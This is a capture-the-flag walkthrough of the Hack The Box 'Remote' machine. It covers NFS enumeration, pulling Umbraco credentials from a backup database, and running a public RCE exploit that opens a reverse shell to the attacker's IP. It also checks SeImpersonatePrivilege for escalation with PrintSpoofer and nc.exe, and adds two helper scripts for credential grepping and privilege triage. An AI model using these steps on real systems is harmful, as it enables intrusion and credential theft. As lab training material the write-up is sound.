┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
NFS
I found port 2049 open, which is used by the Network File System (NFS), so I'll check whether there are any accessible exports
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ showmount -e $ip
Export list for 10.10.10.180:
/site_backups (everyone)
I found an interesting export, so I'll mount it on my host and look at its content
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ mkdir mnt
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ sudo mount -t nfs $ip:/ ./mnt -o nolock
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ cd mnt/site_backups
┌──(kali㉿kali)-[~/…/machines/Remote/mnt/site_backups]
└─$ ls
App_Browsers App_Plugins Global.asax Umbraco Views aspnet_client css scripts
App_Data Config Media Umbraco_Client Web.config bin default.aspx
I tried to hunt for usernames and passwords, but nothing turned up with grep, so I searched online for where Umbraco CMS stores its credentials and found this:
The CMS stores its credentials in Umbraco.sdf (a SQL Server Compact database under App_Data). Knowing that, I tried to open the file in a text editor, but it is a binary file, so I listed its printable content with strings and grepped for credentials
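The strings-and-grep hunt above, as an added shell example that is not part of the original writeup: it turns a binary file into printable runs (the same thing `strings -n 6` does), then keeps only the runs that look like an e-mail address, a password or hash-algorithm field, a long base64 blob, or a long hex digest. The sample file is constructed inline with placeholder values; it is not a real Umbraco.sdf, and the function names are mine.

```shell
#!/bin/sh
# Added example, not code from the original writeup. Hunts a binary file
# for credential-looking strings the way "strings FILE | grep ..." does.
# The sample file built below is constructed; the e-mail and the base64
# string are placeholders, not values from any real Umbraco.sdf.

# printable_runs FILE: emulate "strings -n 6": replace every non-printable
# byte with a newline, squeeze repeats, keep runs of at least 6 characters.
printable_runs() {
    tr -cs '[:print:]' '\n' < "$1" | grep -E '^.{6,}$'
}

# hunt_creds FILE: keep only runs that look like an e-mail address, a
# password/hash-algorithm field, a long base64 blob, or a long hex digest.
hunt_creds() {
    printable_runs "$1" | grep -iE \
        '[[:alnum:]._%+-]+@[[:alnum:].-]+\.[[:alpha:]]{2,}|password|hashalgorithm|^[A-Za-z0-9+/]{40,}={0,2}$|^[0-9a-f]{40,}$'
}

# make_sample FILE: write a constructed blob with binary junk around the
# interesting values (placeholder e-mail, placeholder base64 "hash", a JSON
# fragment naming the hash algorithm, and one uninteresting string).
make_sample() {
    printf '\000\001\002umbracoUser\000\000admin@htb.local\000\000' > "$1"
    printf 'VGhpc0lzTm90QVJlYWxIYXNoVmFsdWVKdXN0QVBsYWNlaG9sZGVy\000' >> "$1"
    printf '{"hashAlgorithm":"SHA1"}\000\003\004noise-text\000' >> "$1"
}

sample=$(mktemp)
make_sample "$sample"
hunt_creds "$sample"
rm -f "$sample"
```

On the real target the call is simply `hunt_creds App_Data/Umbraco.sdf`; widen or narrow the pattern list to the field names the application actually uses.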
I searched GitHub for a PoC matching the version of the web app and found this one:
I cloned it locally and ran the exploit
┌──(env)─(kali㉿kali)-[~/…/HTB/machines/Remote/Umbraco-RCE]
└─$ python exploit.py -u admin@htb.local -p 'baconanxxxxxxx' -w http://10.10.10.180/ -i 10.10.16.25
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.180 on port 49705
[+] Trying to bind to :: on port 4445: Done
[+] Waiting for connections on :::4445: Got connection from ::ffff:10.10.10.180 on port 49706
[*] Logging in at http://10.10.10.180//umbraco/backoffice/UmbracoApi/Authentication/PostLogin
[*] Exploiting at http://10.10.10.180//umbraco/developer/Xslt/xsltVisualize.aspx
[*] Switching to interactive mode
PS C:\windows\system32\inetsrv>
PS C:\Users\Public> type Desktop\user.txt
442f18b8accdec694dxxxxxxxxxxx
User flag 442f18b8accdec694dxxxxxxxxxxx
Privilege Escalation
When I ran whoami and looked at the privileges, I knew this was an easy win: the user iis apppool\defaultapppool usually holds SeImpersonatePrivilege, which can be used to escalate to SYSTEM with RoguePotato or PrintSpoofer
PS C:\Users\Public> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
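A triage check for the output above, as an added shell example that is not part of the original writeup: it reads `whoami /priv` text on stdin, prints the two impersonation-class privileges with their state, and succeeds only when SeImpersonatePrivilege is Enabled. The sample input is the table shown above; the `\r` stripping is there because output pasted from a Windows shell usually carries CRLF line endings, which would otherwise make the State column read `Enabled\r`. Function names are mine.

```shell
#!/bin/sh
# Added example, not part of the original writeup: triage "whoami /priv"
# output for the privileges that make PrintSpoofer / RoguePotato viable.

# impersonation_privs: read "whoami /priv" output on stdin, print each
# impersonation-class privilege with its state, and exit 0 only when
# SeImpersonatePrivilege is Enabled.
impersonation_privs() {
    awk '
        { sub(/\r$/, "") }                     # strip CRLF from Windows output
        $1 ~ /^Se(Impersonate|AssignPrimaryToken)Privilege$/ {
            print $1, $NF                      # privilege name and State column
            if ($1 == "SeImpersonatePrivilege" && $NF == "Enabled") ok = 1
        }
        END { exit ok ? 0 : 1 }
    '
}

# sample_privs: the whoami /priv output shown above, reproduced as input.
sample_privs() {
    cat <<'EOF'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
EOF
}

if sample_privs | impersonation_privs; then
    echo "[+] SeImpersonatePrivilege enabled: PrintSpoofer or RoguePotato should work"
else
    echo "[-] no usable impersonation privilege in this token"
fi
```

In practice, paste the real output into a file and run `impersonation_privs < privs.txt`; a `Disabled` SeImpersonatePrivilege is still present in the token and can be enabled by the tool, but the check above deliberately reports only the state it actually sees.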
I downloaded PrintSpoofer.exe & nc.exe from my attack host